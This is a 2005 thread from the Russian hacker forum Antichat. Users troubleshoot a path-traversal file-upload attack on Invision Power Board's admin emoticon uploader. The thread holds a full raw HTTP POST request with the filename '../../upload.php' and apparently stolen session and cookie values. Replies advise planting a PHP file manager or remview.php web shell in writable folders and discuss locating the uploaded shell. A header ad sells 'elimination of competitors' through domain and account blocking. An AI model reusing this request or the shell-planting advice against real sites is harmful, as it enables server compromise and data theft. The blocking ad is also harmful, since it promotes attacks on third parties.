Форум АНТИЧАТ - Вопрос по форуму IPB

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Вопрос по форуму IPB

Опции темы

Поиск в этой теме

Опции просмотра

Вопрос по форуму IPB

25.05.2005, 08:29

dyx

Познающий

Регистрация: 05.04.2005

Сообщений: 46

Провел на форуме:
77505

Репутация: 1

Вопрос по форуму IPB

Кто нить помогите, что за хрень
вот пишу значит код

POST http://site.com/admin.php?adsess=2c9...b0319a74d80531 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://site.com/admin.php?adsess=2c9...ct=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=5716; pass_hash=95cc6b4ac5abdeadc74b73a8ba7200d9;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

2c9b9a61a1a17a542bb0319a74d80531
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../upload.php"
Content-Type: application/octet-stream

"some code here"

-----------------------------7d43942c405bc--

только в выбранную папку ничего не грузится а грузится все в папку emoticons хотя должно в корневую папку форума, я много вариантов пробовал, скажите где ошибка, на локалхосте кстати все работает нормально в любую папку кидает файл, а вот на реальном сервере только в emoticons...

25.05.2005, 13:34

~~KEZ~~

Banned

Регистрация: 18.05.2005

Сообщений: 1,981

Провел на форуме:
1941233

Репутация: 2726

У меня на локалхосте только в emoticons а на серверах не пробовал.
Возможны ограничения по правам. Да и на Windows'е это тоже криво работает.

25.05.2005, 13:37

dampil

Новичок

Регистрация: 05.05.2005

Сообщений: 19

Провел на форуме:
46386

Репутация: 1

Лично я и не смог организовать загрузку файлов через етот метод

25.05.2005, 16:18

Grrl

Участник форума

Регистрация: 17.07.2004

Сообщений: 181

Провел на форуме:
560754

Репутация: 97

Если грузится вообще(!) хоть в emoticons это уже хорошо,значит она открыта на запись! Залевай туда какой-ниить php файл менеджер и дело в шляпе.Нахрена тебе в корневом светиться вообще?
И в emoticons можно заливать прямо из админки если папка открыта на запись.

25.05.2005, 19:32

dyx

Познающий

Регистрация: 05.04.2005

Сообщений: 46

Провел на форуме:
77505

Репутация: 1

в том то и дело что на том серваке который мне нужен там в паку emoticons запрет на заливку

25.05.2005, 23:28

Grrl

Участник форума

Регистрация: 17.07.2004

Сообщений: 181

Провел на форуме:
560754

Репутация: 97

Попрбуй залить через inet-crack в папку uploads она обычно открыта для записи.

26.05.2005, 14:38

dyx

Познающий

Регистрация: 05.04.2005

Сообщений: 46

Провел на форуме:
77505

Репутация: 1

Я уже все перепробовал и inetcrack и чем только непробовал, короче не знаю что делать...

12.06.2005, 06:02

McDI

Новичок

Регистрация: 11.06.2005

Сообщений: 8

Провел на форуме:
331

Репутация: 0

Вы вот тут советуете прикрепить remview.php к посту. Если я заливаю картинку то путь к ней что то вроде:/upload/p21-32-343432, а как вы находите путь к шеллу? Пробовал заливать картинки несколько раз подряд, путь всегда разный, так что угадать не получается!

12.06.2005, 11:24

~~KEZ~~

Banned

Регистрация: 18.05.2005

Сообщений: 1,981

Провел на форуме:
1941233

Репутация: 2726

тоеретичке в Http запросе надо поставить в имени файла
../../имя
тогда путь локально отсечется и зальется на сервер с учетом ../..
однако у мен ятак не получалось

#10

12.06.2005, 13:25

McDI

Новичок

Регистрация: 11.06.2005

Сообщений: 8

Провел на форуме:
331

Репутация: 0

А если в БД поковырять, наверняка так где нить, что нить да записано?

Ps:

Последний раз редактировалось McDI; 12.06.2005 в 13:28..

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
ЕсТь ВоПрос	Guma	Чаты	4	26.10.2005 21:48
Вопрос по форуму phpbb 2.0.11	CyberHack	Форумы	12	30.05.2005 22:01
Вопрос по форуму phpbb 2.0.11	gudok	Форумы	13	21.03.2005 14:44
Вопрос по чатам от http://www.maxchat.ru		Чаты	3	21.12.2002 08:51

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход